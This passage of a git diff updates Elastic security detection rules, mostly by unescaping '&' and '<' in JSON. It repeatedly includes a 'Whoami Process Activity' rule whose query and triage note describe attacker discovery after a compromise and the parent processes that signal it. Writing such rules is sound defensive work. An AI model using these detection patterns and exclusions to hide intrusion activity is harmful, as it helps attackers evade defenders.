- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_105.json b/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_105.json
index 275caa1e278..b718c7c73b4 100644
--- a/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_105.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 47,
 "rule_id": "eea82229-b002-470e-a9e1-00be38b14d32",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_106.json b/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_106.json
index 59aa9863edd..773f55ddde2 100644
--- a/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_106.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_103.json b/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_103.json
index 93eb324cefa..bb6c7ad0cab 100644
--- a/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_103.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_104.json b/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_104.json
index b67ab7fc470..1b24da4f546 100644
--- a/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_104.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_105.json b/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_105.json
index ecb6d1764f5..318ffb6feeb 100644
--- a/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_105.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_106.json b/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_106.json index 8c00a7a98c3..0dc5e8422d3 100644 --- a/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_106.json +++ b/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_106.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_107.json b/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_107.json index 50e95e959d4..c38f238ec3a 100644 --- a/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_107.json +++ b/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_107.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_1.json b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_1.json index d8c725498d3..c6718a224ad 100644 --- a/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_1.json +++ b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_1.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
diff --git a/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_2.json b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_2.json index 056c5e20fee..afce51dbf10 100644 --- a/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_2.json +++ b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_2.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_3.json b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_3.json index e8174210ff8..62debe3bb8f 100644 --- a/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_3.json +++ b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_3.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_4.json b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_4.json index 2a4e6f8460f..e36707f6098 100644 --- a/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_4.json +++ b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_4.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
diff --git a/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_5.json b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_5.json index 5880b55eb5c..4cbbba1d8fc 100644 --- a/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_5.json +++ b/packages/security_detection_engine/kibana/security_rule/ef100a2e-ecd4-4f72-9d1e-2f779ff3c311_5.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_105.json b/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_105.json index bc512d57662..70c74459dbd 100644 --- a/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_105.json +++ b/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_105.json 
@@ -19,7 +19,7 @@ "license": "Elastic License v2", "name": "Whoami Process Activity", "note": "## Triage and analysis\n\n### Investigating Whoami Process Activity\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `whoami` utility. Attackers commonly use this utility to measure their current privileges, discover the current user, determine if a privilege escalation was successful, etc.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- Account Discovery Command via SYSTEM Account - 2856446a-34e6-435b-9fb5-f8f040bfa7ed\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"whoami.exe\" and\n(\n\n (/* scoped for whoami execution under system privileges */\n (user.domain : (\"NT AUTHORITY\", \"NT-AUTORIT\u00c4T\", \"AUTORITE NT\", \"IIS APPPOOL\") or user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\")) and\n\n not (process.parent.name : \"cmd.exe\" and\n process.parent.args : (\"chcp 437\u003enul 2\u003e\u00261 \u0026 C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"chcp 437\u003enul 2\u003e\u00261 \u0026 %systemroot%\\\\system32\\\\whoami /user\",\n \"C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"*WINDOWS\\\\system32\\\\config\\\\systemprofile*\")) and\n not (process.parent.executable : \"C:\\\\Windows\\\\system32\\\\inetsrv\\\\appcmd.exe\" and process.parent.args : \"LIST\") and\n not process.parent.executable : (\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\n \"C:\\\\Program Files\\\\Cohesity\\\\cohesity_windows_agent_service.exe\")) or\n\n process.parent.name : (\"wsmprovhost.exe\", \"w3wp.exe\", \"wmiprvse.exe\", \"rundll32.exe\", \"regsvr32.exe\")\n\n)\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"whoami.exe\" and\n(\n\n (/* scoped for whoami execution under system privileges */\n (user.domain : (\"NT AUTHORITY\", \"NT-AUTORIT\u00c4T\", \"AUTORITE NT\", \"IIS APPPOOL\") or user.id : 
(\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\")) and\n\n not (process.parent.name : \"cmd.exe\" and\n process.parent.args : (\"chcp 437>nul 2>&1 & C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"chcp 437>nul 2>&1 & %systemroot%\\\\system32\\\\whoami /user\",\n \"C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"*WINDOWS\\\\system32\\\\config\\\\systemprofile*\")) and\n not (process.parent.executable : \"C:\\\\Windows\\\\system32\\\\inetsrv\\\\appcmd.exe\" and process.parent.args : \"LIST\") and\n not process.parent.executable : (\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\n \"C:\\\\Program Files\\\\Cohesity\\\\cohesity_windows_agent_service.exe\")) or\n\n process.parent.name : (\"wsmprovhost.exe\", \"w3wp.exe\", \"wmiprvse.exe\", \"rundll32.exe\", \"regsvr32.exe\")\n\n)\n", "related_integrations": [ { "package": "endpoint", @@ -78,7 +78,7 @@ ], "risk_score": 21, "rule_id": "ef862985-3f13-4262-a686-5f357bbb9bc2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", 
diff --git a/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_106.json b/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_106.json index 45acd3c8263..a936d32a4a7 100644 --- a/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_106.json +++ b/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_106.json 
@@ -19,7 +19,7 @@ "license": "Elastic License v2", "name": "Whoami Process Activity", "note": "## Triage and analysis\n\n### Investigating Whoami Process Activity\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `whoami` utility. Attackers commonly use this utility to measure their current privileges, discover the current user, determine if a privilege escalation was successful, etc.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- Account Discovery Command via SYSTEM Account - 2856446a-34e6-435b-9fb5-f8f040bfa7ed\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"whoami.exe\" and\n(\n\n (/* scoped for whoami execution under system privileges */\n (user.domain : (\"NT AUTHORITY\", \"NT-AUTORIT\u00c4T\", \"AUTORITE NT\", \"IIS APPPOOL\") or user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\")) and\n\n not (process.parent.name : \"cmd.exe\" and\n process.parent.args : (\"chcp 437\u003enul 2\u003e\u00261 \u0026 C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"chcp 437\u003enul 2\u003e\u00261 \u0026 %systemroot%\\\\system32\\\\whoami /user\",\n \"C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"*WINDOWS\\\\system32\\\\config\\\\systemprofile*\")) and\n not (process.parent.executable : \"C:\\\\Windows\\\\system32\\\\inetsrv\\\\appcmd.exe\" and process.parent.args : \"LIST\") and\n not process.parent.executable : (\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\n \"C:\\\\Program Files\\\\Cohesity\\\\cohesity_windows_agent_service.exe\")) or\n\n process.parent.name : (\"wsmprovhost.exe\", \"w3wp.exe\", \"wmiprvse.exe\", \"rundll32.exe\", \"regsvr32.exe\")\n\n)\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"whoami.exe\" and\n(\n\n (/* scoped for whoami execution under system privileges */\n (user.domain : (\"NT AUTHORITY\", \"NT-AUTORIT\u00c4T\", \"AUTORITE NT\", \"IIS APPPOOL\") or user.id : 
(\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\")) and\n\n not (process.parent.name : \"cmd.exe\" and\n process.parent.args : (\"chcp 437>nul 2>&1 & C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"chcp 437>nul 2>&1 & %systemroot%\\\\system32\\\\whoami /user\",\n \"C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"*WINDOWS\\\\system32\\\\config\\\\systemprofile*\")) and\n not (process.parent.executable : \"C:\\\\Windows\\\\system32\\\\inetsrv\\\\appcmd.exe\" and process.parent.args : \"LIST\") and\n not process.parent.executable : (\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\n \"C:\\\\Program Files\\\\Cohesity\\\\cohesity_windows_agent_service.exe\")) or\n\n process.parent.name : (\"wsmprovhost.exe\", \"w3wp.exe\", \"wmiprvse.exe\", \"rundll32.exe\", \"regsvr32.exe\")\n\n)\n", "related_integrations": [ { "package": "endpoint", @@ -78,7 +78,7 @@ ], "risk_score": 21, "rule_id": "ef862985-3f13-4262-a686-5f357bbb9bc2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -90,7 +90,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", 
diff --git a/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_107.json b/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_107.json index 6e5b78e3c6c..675a23b8d5b 100644 --- a/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_107.json +++ b/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_107.json 
@@ -19,7 +19,7 @@ "license": "Elastic License v2", "name": "Whoami Process Activity", "note": "## Triage and analysis\n\n### Investigating Whoami Process Activity\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `whoami` utility. Attackers commonly use this utility to measure their current privileges, discover the current user, determine if a privilege escalation was successful, etc.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- Account Discovery Command via SYSTEM Account - 2856446a-34e6-435b-9fb5-f8f040bfa7ed\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"whoami.exe\" and\n(\n\n (/* scoped for whoami execution under system privileges */\n (user.domain : (\"NT AUTHORITY\", \"NT-AUTORIT\u00c4T\", \"AUTORITE NT\", \"IIS APPPOOL\") or user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\")) and\n\n not (process.parent.name : \"cmd.exe\" and\n process.parent.args : (\"chcp 437\u003enul 2\u003e\u00261 \u0026 C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"chcp 437\u003enul 2\u003e\u00261 \u0026 %systemroot%\\\\system32\\\\whoami /user\",\n \"C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"*WINDOWS\\\\system32\\\\config\\\\systemprofile*\")) and\n not (process.parent.executable : \"C:\\\\Windows\\\\system32\\\\inetsrv\\\\appcmd.exe\" and process.parent.args : \"LIST\") and\n not process.parent.executable : (\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\n \"C:\\\\Program Files\\\\Cohesity\\\\cohesity_windows_agent_service.exe\")) or\n\n process.parent.name : (\"wsmprovhost.exe\", \"w3wp.exe\", \"wmiprvse.exe\", \"rundll32.exe\", \"regsvr32.exe\")\n\n)\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"whoami.exe\" and\n(\n\n (/* scoped for whoami execution under system privileges */\n (user.domain : (\"NT AUTHORITY\", \"NT-AUTORIT\u00c4T\", \"AUTORITE NT\", \"IIS APPPOOL\") or user.id : 
(\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\")) and\n\n not (process.parent.name : \"cmd.exe\" and\n process.parent.args : (\"chcp 437>nul 2>&1 & C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"chcp 437>nul 2>&1 & %systemroot%\\\\system32\\\\whoami /user\",\n \"C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"*WINDOWS\\\\system32\\\\config\\\\systemprofile*\")) and\n not (process.parent.executable : \"C:\\\\Windows\\\\system32\\\\inetsrv\\\\appcmd.exe\" and process.parent.args : \"LIST\") and\n not process.parent.executable : (\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\n \"C:\\\\Program Files\\\\Cohesity\\\\cohesity_windows_agent_service.exe\")) or\n\n process.parent.name : (\"wsmprovhost.exe\", \"w3wp.exe\", \"wmiprvse.exe\", \"rundll32.exe\", \"regsvr32.exe\")\n\n)\n", "related_integrations": [ { "package": "endpoint", @@ -78,7 +78,7 @@ ], "risk_score": 21, "rule_id": "ef862985-3f13-4262-a686-5f357bbb9bc2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", 
diff --git a/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_108.json b/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_108.json index 0296483b7e0..63801bf77f7 100644 --- a/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_108.json +++ b/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_108.json 
@@ -19,7 +19,7 @@ "license": "Elastic License v2", "name": "Whoami Process Activity", "note": "## Triage and analysis\n\n### Investigating Whoami Process Activity\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `whoami` utility. Attackers commonly use this utility to measure their current privileges, discover the current user, determine if a privilege escalation was successful, etc.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- Account Discovery Command via SYSTEM Account - 2856446a-34e6-435b-9fb5-f8f040bfa7ed\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"whoami.exe\" and\n(\n\n (/* scoped for whoami execution under system privileges */\n (user.domain : (\"NT AUTHORITY\", \"NT-AUTORIT\u00c4T\", \"AUTORITE NT\", \"IIS APPPOOL\") or user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\")) and\n\n not (process.parent.name : \"cmd.exe\" and\n process.parent.args : (\"chcp 437\u003enul 2\u003e\u00261 \u0026 C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"chcp 437\u003enul 2\u003e\u00261 \u0026 %systemroot%\\\\system32\\\\whoami /user\",\n \"C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"*WINDOWS\\\\system32\\\\config\\\\systemprofile*\")) and\n not (process.parent.executable : \"C:\\\\Windows\\\\system32\\\\inetsrv\\\\appcmd.exe\" and process.parent.args : \"LIST\") and\n not process.parent.executable : (\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\n \"C:\\\\Program Files\\\\Cohesity\\\\cohesity_windows_agent_service.exe\")) or\n\n process.parent.name : (\"wsmprovhost.exe\", \"w3wp.exe\", \"wmiprvse.exe\", \"rundll32.exe\", \"regsvr32.exe\")\n\n)\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"whoami.exe\" and\n(\n\n (/* scoped for whoami execution under system privileges */\n (user.domain : (\"NT AUTHORITY\", \"NT-AUTORIT\u00c4T\", \"AUTORITE NT\", \"IIS APPPOOL\") or 
